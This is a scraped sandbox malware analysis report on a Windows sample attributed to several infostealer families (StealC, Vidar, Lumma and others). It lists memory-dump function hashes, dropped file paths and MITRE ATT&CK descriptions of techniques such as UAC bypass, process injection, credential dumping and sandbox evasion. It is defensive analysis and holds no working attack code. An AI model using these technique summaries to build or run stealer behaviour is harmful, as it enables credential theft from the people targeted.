Instruction ID: b5b37954a7ef95b00466eb10e03601eb3a3a665e6ba98ef9df5c99400e63585d
Opcode Fuzzy Hash: 0c78bcedb3a636b3296a1999f4eef0ff30d8856bb4ed3d6428b6e77f8e4abe5c
Instruction Fuzzy Hash: 12310475A012168FDB10DF58C854A9ABBF6FF80305F168629C8179B301EB36E956CBE0

Function 6C0FF5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6C0FF611
memcpy.VCRUNTIME140(?,?,?), ref: 6C0FF623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C0FF652
memcpy.VCRUNTIME140(?,?,?), ref: 6C0FF668

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: dd71697da23465c68ce2c8fcbf0cab1219d7d8b9ee323104b76ce476d40599a5
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: CE313E71A00224AFCB14CF69CCC0B9EB7F9EB84758B148539EA598BB04D631E985CB90

Function 6C0C39A0 Relevance: 5.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C14E744,6C127765,00000000,6C127765,?,6C0E6112), ref: 6C0C39AF
LeaveCriticalSection.KERNEL32(6C14E744,?,6C0E6112), ref: 6C0C3A34
EnterCriticalSection.KERNEL32(6C14E784,6C0E6112), ref: 6C0C3A4B
LeaveCriticalSection.KERNEL32(6C14E784), ref: 6C0C3A5F

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 41989523ddcec36b36275ed9a7e72ca029e1f7f4306f23ad179dcf3cf97e413d
Instruction ID: 46ae80d2070bc47df3392dda36c4d4cafc1bfcb5aa0baa71ee9eba98e9aaf363
Opcode Fuzzy Hash: 41989523ddcec36b36275ed9a7e72ca029e1f7f4306f23ad179dcf3cf97e413d
Instruction Fuzzy Hash: 15213532301A018FC724EB65C456BAEB3F1EF8A72CB288529C96597F40D730A941DBD2

Function 6C0DB940 Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C0DB96F
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6C0DB99A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C0DB9B0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0DB9B9

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: memcpy$freemalloc
String ID:
API String ID: 3313557100-0
Opcode ID: eb87c5e74f43534d782a94ae1e503943bdd2e304ab161ffcc5fa07bc12da7be4
Instruction ID: 8254f86439cc58b3f9502ebd9ac47d35942fe95341addb7925f51e935b502c00
Opcode Fuzzy Hash: eb87c5e74f43534d782a94ae1e503943bdd2e304ab161ffcc5fa07bc12da7be4
Instruction Fuzzy Hash: F9117FB5A003059FCB04DF69D8809ABF7F8BF98314B14853AE919D7701D731E9198AA0

Function 6C1126B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C1126C1
free.MOZGLUE(?), ref: 6C1126E4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C1126FF
free.MOZGLUE ref: 6C11270D

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 7817f3fc460e1bc49c678526076a6fa3b9636ed2ab251b4f43c20e789dbd3e68
Instruction ID: 72c710412987aea40e4e37dd7aaa98d6a1c815374beb208a67006aacebb49c96
Opcode Fuzzy Hash: 7817f3fc460e1bc49c678526076a6fa3b9636ed2ab251b4f43c20e789dbd3e68
Instruction Fuzzy Hash: 57F0F9B67052005BE7109B18D884A5B73A9EF6631CB540035EE16C3F01E336F919C692

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Socks5Systemz

Threatname: Vidar

Threatname: Amadey

Threatname: Cryptbot

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\CAAKFIID

C:\ProgramData\CFHDBFIEGIDGIECBKJECBKFHCA

C:\ProgramData\DAECAECFCAAEBFHIEHDGHDHCBA

Windows Analysis Report
file.exe

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre